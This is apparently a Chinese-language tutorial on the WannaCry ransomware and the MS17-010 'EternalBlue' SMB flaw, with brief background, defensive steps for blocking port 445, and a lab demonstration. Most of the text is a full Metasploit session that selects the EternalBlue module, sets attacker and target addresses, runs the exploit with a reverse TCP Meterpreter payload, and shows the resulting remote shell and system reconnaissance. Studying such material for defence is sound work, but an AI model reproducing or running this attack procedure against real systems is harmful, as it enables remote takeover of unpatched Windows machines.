WannaCry 主要利用的哪个漏洞进行攻击的?
背景及漏洞介绍
当用户主机系统被该勒索软件入侵后,弹出如下勒索对话框,提示勒索目的并向用户索要比特币。而对于用户主机上的重要文件,如:照片、图片、文档、压缩包、音频、视频、可执行程序等几乎所有类型的文件,都被加密的文件后缀名被统一修改为“.WNCRY”。安全业界暂未能有效破除该勒索软的恶意加密行为,用户主机一旦被勒索软件渗透,只能通过重装操作系统的方式来解除勒索行为,但用户重要数据文件不能直接恢复。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PU7ufNi8-1658668301856)(https://bkimg.cdn.bcebos.com/pic/203fb80e7bec54e7e2c7b02db4389b504fc26ade?x-bce-process=image/resize,m_lfit,w_1280,limit_1/format,f_auto)]
主要利用漏洞:
2017年5月12日,WannaCry蠕虫通过MS17-010漏洞在全球范围大爆发,感染了大量的计算机,该蠕虫感染计算机后会向计算机中植入敲诈者病毒,导致电脑大量文件被加密。
WannaCry利用Windows操作系统445端口存在的漏洞进行传播,并具有自我复制、主动传播的特性。
,“永恒之蓝”是NSA泄露的漏洞利用工具的名称,并不是该病毒的名称#。永恒之蓝”是指NSA泄露的危险漏洞“EternalBlue”,此次的勒索病毒WannaCry是利用该漏洞进行传播的,当然还可能有其他病毒也通过“永恒之蓝”这个漏洞传播,因此给系统打补丁是必须的
演示“永恒之蓝”漏洞,也即MS17-010漏洞:
1.靶机IP地址
2.利用msf攻击
(1)搜索永恒之蓝exp
(2)设置ip地址
(3)攻击
(4)攻击成功
防御措施:
Win7、Win8、Win10的处理流程
1、打开控制面板-系统与安全-Windows防火墙,点击左侧启动或关闭Windows防火墙。
2、选择启动防火墙,并点击确定
3、点击高级设置
4、点击入站规则,新建规则
5、选择端口,下一步
6、特定本地端口,输入445,下一步
7、选择阻止连接,下一步
8、配置文件,全选,下一步
9、名称,可以任意输入,完成即可。
XP系统的处理流程
1、依次打开控制面板,安全中心,Windows防火墙,选择启用
2、点击开始,运行,输入cmd,确定执行下面三条命令:net stop rdr 、net stop srv 、net stop netbt
msf6 exploit(windows/browser/ms11_050_mshtml_cobjectelement) > search eternal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
2 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
3 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
4 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 exploit(windows/browser/ms11_050_mshtml_cobjectelement) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file w
ith syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.16.35.137 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 172.16.35.136
lhost => 172.16.35.136
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 172.16.35.139
rhosts => 172.16.35.139
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 172.16.35.136:4444
[*] 172.16.35.139:445 - Executing automatic check (disable AutoCheck to override)
[*] 172.16.35.139:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.16.35.139:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 172.16.35.139:445 - Scanned 1 of 1 hosts (100% complete)
[+] 172.16.35.139:445 - The target is vulnerable.
[*] 172.16.35.139:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.16.35.139:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 172.16.35.139:445 - Scanned 1 of 1 hosts (100% complete)
[*] 172.16.35.139:445 - Connecting to target for exploitation.
[+] 172.16.35.139:445 - Connection established for exploitation.
[+] 172.16.35.139:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.35.139:445 - CORE raw buffer dump (38 bytes)
[*] 172.16.35.139:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 172.16.35.139:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 172.16.35.139:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 172.16.35.139:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.35.139:445 - Trying exploit with 12 Groom Allocations.
[*] 172.16.35.139:445 - Sending all but last fragment of exploit packet
[*] 172.16.35.139:445 - Starting non-paged pool grooming
[+] 172.16.35.139:445 - Sending SMBv2 buffers
[+] 172.16.35.139:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.35.139:445 - Sending final SMBv2 buffers.
[*] 172.16.35.139:445 - Sending last fragment of exploit packet!
[*] 172.16.35.139:445 - Receiving response from exploit packet
[+] 172.16.35.139:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.16.35.139:445 - Sending egg to corrupted connection.
[*] 172.16.35.139:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 172.16.35.139
[*] Meterpreter session 1 opened (172.16.35.136:4444 -> 172.16.35.139:49159) at 2022-07-21 21:26:30 +0800
[+] 172.16.35.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.35.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.35.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > sysinfo
Computer : WIN-50HM5UIKP60
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > ipconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 11
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:78:c7:d1
MTU : 1500
IPv4 Address : 172.16.35.139
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::2c4d:f99f:5511:8da8
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 12
============
Name : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:ac10:238b
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff